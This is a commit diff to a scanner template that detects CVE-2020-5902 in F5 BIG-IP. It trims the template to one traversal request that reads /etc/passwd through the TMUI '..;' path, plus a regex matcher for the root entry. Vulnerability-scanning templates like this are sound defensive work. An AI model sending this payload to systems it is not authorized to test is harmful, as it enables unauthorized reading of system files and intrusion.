Update CVE-2020-5902.yaml
parent
4f63a86229
commit
0fe4c5ee3d
|
@ -8,21 +8,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa"
|
|
||||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp"
|
|
||||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
|
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- "jaffa"
|
|
||||||
- "Tabset"
|
|
||||||
- "success"
|
|
||||||
condition: and
|
|
||||||
part: body
|
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "root:[x*]:0:0:"
|
- "root:[x*]:0:0:"
|
||||||
|
|
Loading…
Reference in New Issue